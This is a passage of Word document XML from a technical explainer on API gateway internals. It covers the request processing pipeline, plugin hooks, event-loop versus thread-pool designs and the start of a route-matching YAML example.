          <w:ilvl w:val="0"/>
          <w:numId w:val="846"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>CORS handling (respond to preflight requests, set access control headers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ED3177" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="846"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Request validation (schema validation, parameter type checking).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248F582E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="846"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Circuit breaking (detect failing downstream services).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A36AE29" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>With 100 microservices, this means 100 implementations of each concern — 100 JWT validation libraries, 100 rate limiting implementations, 100 TLS certificate configurations. </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Each implementation is a potential source of inconsistency, bugs, and security vulnerabilities.</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> The API gateway centralizes these concerns into one place, implemented once, applied uniformly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC41F62" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>But the API gateway is not purely a simplification — it introduces its own complexities: it becomes a </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>critical single point of failure</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> (everything flows through it), a </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>performance bottleneck</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> (adds latency to every request), and a </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>configuration management challenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> (routing rules, authentication policies, rate limits for every service need maintenance). Understanding API gateways requires understanding both what they enable and what they cost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F4A6D4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="6E0FE9EE">
          <v:rect id="_x0000_i3824" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B0DDA6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. API Gateway Internal Architecture — How It Actually Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0433D97D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Request Processing Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542B3C04" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Every request through an API gateway traverses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sequential processing pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> — a chain of stages, each performing a specific function. The pipeline architecture is the gateway's fundamental internal design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AA5AB8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37670296" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Incoming Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DB01BF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDEBA47" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[1. Connection Acceptance]     TLS termination, TCP connection management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249D10FC" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A14932" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[2. Request Parsing]           HTTP method, path, headers, body parsing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E81DF1A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7758BD69" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[3. Route Matching]            Match request to backend route/service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2267649A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738B1A5F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[4. Authentication]            Validate credentials (JWT, API key, OAuth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7F91B8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B060633" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[5. Authorization]             Check permissions (RBAC, ABAC, OPA policies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4128C1DF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A25EB4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[6. Rate Limiting]             Check and decrement rate limit counters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1717FF4D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA9F3A2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[7. Request Transformation]    Rewrite headers, transform body, inject context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F44C58" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F21922D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[8. Request Validation]        Schema validation, parameter checking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F1A9C2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230A300D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[9. Circuit Breaker Check]     Is the target service healthy?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E21B84" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75468B04" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>[10. Load Balancing]           Select specific backend instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E500028" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E22C0FE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[11. Backend Request]          Forward request to selected backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2652AE89" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFE8494" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[12. Response Transformation]  Transform response headers and body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B30EE31" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2EB220" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[13. Caching]                  Store cacheable responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D747E25" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3918297C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[14. Observability]            Log request, emit metrics, complete trace span</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC3DEE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE0C307" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Response to Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A6CF38" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The pipeline is not linear — it is conditional.</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> A rate limit failure at stage 6 immediately returns a 429 Too Many Requests response without proceeding to stages 7–14. An authentication failure at stage 4 returns 401 Unauthorized without hitting the backend. This </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fail-fast</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> design is critical — rejecting unauthorized or rate-limited requests before backend contact protects the backend from load it shouldn't bear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24684B7F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Plugin/middleware architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50250ACC" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Production API gateways (Kong, AWS API Gateway, Envoy, NGINX, Tyk) implement the pipeline as </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>composable plugins or middleware</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t>. Each stage is a pluggable component that can be enabled, disabled, configured, and ordered. This enables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C0EC6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="847"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Adding a new authentication mechanism without changing core gateway code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276F9387" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="847"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Applying different pipeline stages to different routes (public endpoints skip authentication; admin endpoints add IP allowlisting).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7B7476" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="847"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Custom plugins for organization-specific logic (injecting internal headers, custom audit logging).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612FCB93" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The plugin execution model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A1B839" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Each plugin has two execution hooks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342512D0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="848"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Request phase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Executes before the request is forwarded to the backend. Can inspect and modify the request, or short-circuit by returning a response immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4F8092" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="848"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response phase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Executes after the backend response is received. Can inspect and modify the response before returning to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E041933" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Some gateways (Kong, NGINX+Lua) allow plugins written in Lua or WASM (WebAssembly), executing in the gateway's event loop without additional process overhead. Others (AWS Lambda@Edge, Cloudflare Workers) execute plugins as serverless functions at the edge — more flexible but with function invocation overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E47858B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Event Loop vs Thread Pool Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DAF6B8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Event-driven (Nginx, Envoy, Kong):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6337C6C9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Single-threaded event loop (or one per CPU core) using non-blocking I/O (epoll/kqueue). Each request moves through the pipeline asynchronously — when a stage blocks on I/O (e.g., calling Redis for rate limit check), the event loop handles other requests while waiting for the I/O to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD1F3F8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Performance characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8960F7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="849"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Very high concurrency (thousands to hundreds of thousands of connections per core).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73599E8C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="849"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>CPU-intensive pipeline stages (complex JWT validation, request body parsing) block the event loop — must be optimized or offloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50245140" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="849"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Memory-efficient — no per-connection thread stack overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4DEFC6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thread pool (Spring Cloud Gateway, older gateway implementations):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F44B81" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>One thread per request (or connection). Blocking I/O is acceptable — the thread blocks while waiting for Redis, the upstream service, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B018621" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Performance characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648379FA" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="850"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Simpler programming model (sequential code, no callbacks or async/await).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EB4B6E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="850"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Thread stack overhead (~1MB per thread) limits concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B98C1C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="850"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Context-switching overhead at high thread counts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6440DD25" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="850"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Modern implementations use reactive/non-blocking frameworks (Spring WebFlux, Netty) to get async benefits without callback complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2770BF84" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="738E447F">
          <v:rect id="_x0000_i3825" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6FF416" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Route Matching — The Internal Decision Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F3AE43" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Route matching is the gateway's </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>core routing function</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> — determining which backend service handles each incoming request. This seems simple but has substantial engineering depth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F70F1A5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Route Definition and Priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF30E59" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Routes are defined as rules combining multiple criteria:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697A55A4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>YAML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15346CEA" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>routes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17431BE9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  - name: payment-api-v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04927764" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    match:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FADE38" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      hosts: ["api.example.com"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102BC83D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      paths: ["/v2/payments/*"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAD80FC" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      methods: ["POST", "PUT"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3A368F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4C0541" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">        X-API-Version: "2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187291D1" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    backends:</w:t>
      </w:r>
    </w:p>
